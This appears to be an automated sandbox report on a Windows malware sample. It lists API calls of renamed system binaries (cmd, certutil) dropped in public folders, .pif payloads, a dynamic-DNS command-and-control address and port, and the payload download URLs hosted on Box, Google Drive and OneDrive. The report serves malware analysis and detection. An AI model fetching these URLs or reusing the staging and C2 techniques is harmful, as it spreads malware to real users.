Source:	Binary string: cmd.pdb source: alpha.exe, 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1644562863.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1647785940.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1660935260.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1654132001.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1662066219.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1663916561.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1664317831.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1665714622.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1648239065.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1652106938.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1660326356.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1654699931.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	3_2_00007FF683F82978
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	3_2_00007FF683F8823C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	3_2_00007FF683F71560
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	3_2_00007FF683F735B8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F97B4C FindFirstFileW,FindNextFileW,FindClose,	3_2_00007FF683F97B4C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	5_2_00007FF683F82978
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	5_2_00007FF683F8823C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	5_2_00007FF683F71560
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	5_2_00007FF683F735B8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F97B4C FindFirstFileW,FindNextFileW,FindClose,	5_2_00007FF683F97B4C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658FC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,	6_2_00007FF6658FC6F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66596234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,	6_2_00007FF66596234C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659610C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF6659610C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665963100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF665963100
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665966F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,	6_2_00007FF665966F80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665943674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,	6_2_00007FF665943674
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658CD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658CD440
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,	6_2_00007FF66590D4A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,	6_2_00007FF66590B3D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665905E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,	6_2_00007FF665905E58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665961B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,	6_2_00007FF665961B04
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659619F8 #359,FindFirstFileW,FindNextFileW,FindClose,	6_2_00007FF6659619F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,	6_2_00007FF66590DBC0
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_1529BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	9_2_1529BD37
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_15299665 FindFirstFileW,FindNextFileW,FindClose,FindClose,	9_2_15299665
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_1529783C FindFirstFileW,FindNextFileW,	9_2_1529783C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_1529880C FindFirstFileW,FindNextFileW,FindClose,	9_2_1529880C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_1529BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	9_2_1529BB30
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_1529C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	9_2_1529C34D
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152AC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	9_2_152AC291
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152A9AF5 FindFirstFileW,	9_2_152A9AF5
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	10_2_00007FF683F82978
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	10_2_00007FF683F8823C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	10_2_00007FF683F71560
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	10_2_00007FF683F735B8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F97B4C FindFirstFileW,FindNextFileW,FindClose,	10_2_00007FF683F97B4C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	11_2_00007FF683F82978
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	11_2_00007FF683F8823C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	11_2_00007FF683F71560
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	11_2_00007FF683F735B8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F97B4C FindFirstFileW,FindNextFileW,FindClose,	11_2_00007FF683F97B4C
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14559665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_14559665
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14559253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_14559253
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1456C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	24_2_1456C291
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1455C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	24_2_1455C34D
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1455BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	24_2_1455BD37
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1455880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	24_2_1455880C
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1455783C FindFirstFileW,FindNextFileW,	24_2_1455783C
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14569AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	24_2_14569AF5
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1455BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	24_2_1455BB30
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_02A558CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	24_2_02A558CC

Source: C:\Users\Public\Libraries\Mywiztwu.PIF

Code function: 24_2_14557C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

24_2_14557C97

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 37.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: embargogo237.duckdns.org

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_0284C8AC InternetCheckConnectionA,

9_2_0284C8AC

Source: global traffic

TCP traffic: 192.168.2.4:49742 -> 45.74.19.121:10521

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 13.107.139.11 13.107.139.11
Source: Joe Sandbox View	IP Address: 74.112.186.144 74.112.186.144
Source: Joe Sandbox View	IP Address: 45.74.19.121 45.74.19.121
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View

ASN Name: HVC-ASUS HVC-ASUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /shared/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: elmauz.box.com
Source: global traffic	HTTP traffic detected: GET /public/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: elmauz.box.com
Source: global traffic	HTTP traffic detected: GET /public/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: elmauz.app.box.com
Source: global traffic	HTTP traffic detected: GET /d/1/b1!XLo_Q0QmFWpqIy6-EXFQ9uv0OB_40zrbGjai9TcdxDKZbJbN56Wp7ifaYdZk88KhAWL73bNdMz9KaCrVvwKX0Su4zvaj7mW1FHJqJjxl3sfcF-bc1OmTF8kpZrS84e8a2C27k35yKaDpJp8vR8Uw6I00iViogD5h6EyILqfYd3FDItd43Oq97WjEvH6tiSTY6vmIREZJGxMxZeR655cof5hJ0JFbyuYCiKq1wRr6_fh3MkyXz6OTytLSUByoutEcQlpQxuXHlbV_8lquwjsfLn5YWMXnweyypB2YObL8ienhqGPcvOJCzFyxpoiAmwUj27ZUiyd36Zd4P3CRvHX6jQnRv5iN9GiTaSLSJPO-4u3-VB_8pZLFnTekxWXMSCL5lENOLhaegjQiJeVsGX7PM3jX1hKaH7e2kGCVqqHSLLX6H0ZayPi9GWBgWqbQp3pBu9jGZWHL4UHp2l6c_jkqMKAllFMM3Iv_dBkoNpOikeMk2Jg1XlufJ9aC4fsnjX6EqhHPkjkhiuCmSy8c434KrZiql8EG73hEu8YAbkeiFMIuEi65NeBnlQrm82ujfsBdWWQ2eFpiys1O5ZdmToudadswXQ2TbuM2ilvmsZOGXUf3NStV6obnKx1fPIzoj8ReXUyBb0ime0ItITmPbPnzialTI8LPoiHbIQ5aNaebRT8jMXMJlVSVmFOFBkK-33bgu-XiYmvt_Q920H6uFFohmX-fHn2C6iRLtBg_79TGIakTq4kaO_eY56e0s3xhFykDz9DiFRvDMu9Maxc8hLkzJl3KLV7d1brBO_ssrAr_kC_94aq6OXsNyp_2UEt0923KvZRqQD8efN0mgQF40ml0kle0vzgDSZoqOp1JFPY33T3Bb848hiqNlVhoSPFwYZgiYoPa_jQ7k3Oos1pfcJ3IDZFUG6ELh1ErPGZaUK0N2nqWnDqJPX9SnAXOmZE3g8TziaTtC-RGoFsPyMCdEBuCPaeWb7wcLWAdrU9AWiIY_ARHtKhQ4BjUixP9PJtlIoE4YpqzY5xpR3Hr8QoLV_vNLjHDJEoR4dj4njGdTgQlQx25va1TsBMyxmmPeaatyMaAtjo-e2PW0eo_Bj234qVnjRvrw1xilOMIN3SgT3NZJCZoFTLVEVy61i6q51hM7Dp_Qzz43uXSbWHULy1UeDIuHOzp5_zPIZgXIOiaXnhhyeJgJznw1KjcVTxqvuP5HEjGXE1U6l7guuTRUpaQZGdYaUKP3Vw4t_joSJYXGuc-2Cc9mea3nAhiG5mOq6PKd1K0_B3sbZESPTVNPpjTcjlh5WQN2BHQpHmhXJe8TxusY5zdpltOYK_BC8ChwrAUvjX3OlSq8ZumPjHGUqSW95I2ZcHYII5pPuoHPKadfCsJ-ks9FOOcFifEVclt/download HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: public.boxcloud.com
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1ZA0hVLfDKlM-5smXwBfb4RnNU-YQkBa6 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
Source: global traffic	HTTP traffic detected: GET /download?id=1ZA0hVLfDKlM-5smXwBfb4RnNU-YQkBa6&export=download HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET /download?resid=BAF30C9243AC3050%21114&authkey=!ACfGQrCE2jZmaGY HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_152B6CB1 recv,

9_2_152B6CB1

Source: global traffic	HTTP traffic detected: GET /shared/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: elmauz.box.com
Source: global traffic	HTTP traffic detected: GET /public/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: elmauz.box.com
Source: global traffic	HTTP traffic detected: GET /public/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: elmauz.app.box.com
Source: global traffic	HTTP traffic detected: GET /d/1/b1!XLo_Q0QmFWpqIy6-EXFQ9uv0OB_40zrbGjai9TcdxDKZbJbN56Wp7ifaYdZk88KhAWL73bNdMz9KaCrVvwKX0Su4zvaj7mW1FHJqJjxl3sfcF-bc1OmTF8kpZrS84e8a2C27k35yKaDpJp8vR8Uw6I00iViogD5h6EyILqfYd3FDItd43Oq97WjEvH6tiSTY6vmIREZJGxMxZeR655cof5hJ0JFbyuYCiKq1wRr6_fh3MkyXz6OTytLSUByoutEcQlpQxuXHlbV_8lquwjsfLn5YWMXnweyypB2YObL8ienhqGPcvOJCzFyxpoiAmwUj27ZUiyd36Zd4P3CRvHX6jQnRv5iN9GiTaSLSJPO-4u3-VB_8pZLFnTekxWXMSCL5lENOLhaegjQiJeVsGX7PM3jX1hKaH7e2kGCVqqHSLLX6H0ZayPi9GWBgWqbQp3pBu9jGZWHL4UHp2l6c_jkqMKAllFMM3Iv_dBkoNpOikeMk2Jg1XlufJ9aC4fsnjX6EqhHPkjkhiuCmSy8c434KrZiql8EG73hEu8YAbkeiFMIuEi65NeBnlQrm82ujfsBdWWQ2eFpiys1O5ZdmToudadswXQ2TbuM2ilvmsZOGXUf3NStV6obnKx1fPIzoj8ReXUyBb0ime0ItITmPbPnzialTI8LPoiHbIQ5aNaebRT8jMXMJlVSVmFOFBkK-33bgu-XiYmvt_Q920H6uFFohmX-fHn2C6iRLtBg_79TGIakTq4kaO_eY56e0s3xhFykDz9DiFRvDMu9Maxc8hLkzJl3KLV7d1brBO_ssrAr_kC_94aq6OXsNyp_2UEt0923KvZRqQD8efN0mgQF40ml0kle0vzgDSZoqOp1JFPY33T3Bb848hiqNlVhoSPFwYZgiYoPa_jQ7k3Oos1pfcJ3IDZFUG6ELh1ErPGZaUK0N2nqWnDqJPX9SnAXOmZE3g8TziaTtC-RGoFsPyMCdEBuCPaeWb7wcLWAdrU9AWiIY_ARHtKhQ4BjUixP9PJtlIoE4YpqzY5xpR3Hr8QoLV_vNLjHDJEoR4dj4njGdTgQlQx25va1TsBMyxmmPeaatyMaAtjo-e2PW0eo_Bj234qVnjRvrw1xilOMIN3SgT3NZJCZoFTLVEVy61i6q51hM7Dp_Qzz43uXSbWHULy1UeDIuHOzp5_zPIZgXIOiaXnhhyeJgJznw1KjcVTxqvuP5HEjGXE1U6l7guuTRUpaQZGdYaUKP3Vw4t_joSJYXGuc-2Cc9mea3nAhiG5mOq6PKd1K0_B3sbZESPTVNPpjTcjlh5WQN2BHQpHmhXJe8TxusY5zdpltOYK_BC8ChwrAUvjX3OlSq8ZumPjHGUqSW95I2ZcHYII5pPuoHPKadfCsJ-ks9FOOcFifEVclt/download HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: public.boxcloud.com
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1ZA0hVLfDKlM-5smXwBfb4RnNU-YQkBa6 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
Source: global traffic	HTTP traffic detected: GET /download?id=1ZA0hVLfDKlM-5smXwBfb4RnNU-YQkBa6&export=download HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET /download?resid=BAF30C9243AC3050%21114&authkey=!ACfGQrCE2jZmaGY HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: sppsvc.pif, 00000009.00000003.1769782636.0000000000779000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: Zwx-cn.come0v*.googlesandbox-cn.comh*.safenup.googlesandbox-cn.comc*.gstatic.comrP*.metric.gstatic.comXOm*.gvt1.comC*.gcpcdn.gvt1.comWb*.gvt2.comW*.gcp.gvt2.comi*.url.google.comxpR*.youtube-nocookie.comn*.ytimg.comandroid.com*.android.comW0*.flash.android.comg.cnSgT*.g.cnFg.coy61*.g.co7goo.gl3www.goo.glegoogle-analytics.comhhy*.google-analytics.comXgoogle.comUgooglecommerce.comS*.googlecommerce.commOqggpht.cn3sb*.ggpht.cncurchin.comp*.urchin.comzdpyoutu.beChwyoutube.com*.youtube.com2Zyoutubeeducation.coms9F*.youtubeeducation.comyoutubekids.com*.youtubekids.comB_40yt.beDKZb*.yt.beandroid.clients.google.comTFdeveloper.android.google.cndevelopers.android.google.cn6_fh3Msource.android.google.cnypB2YOdeveloper.chrome.google.cnN9web.developers.google.cnsGX7PMb equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: elmauz.box.com

Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
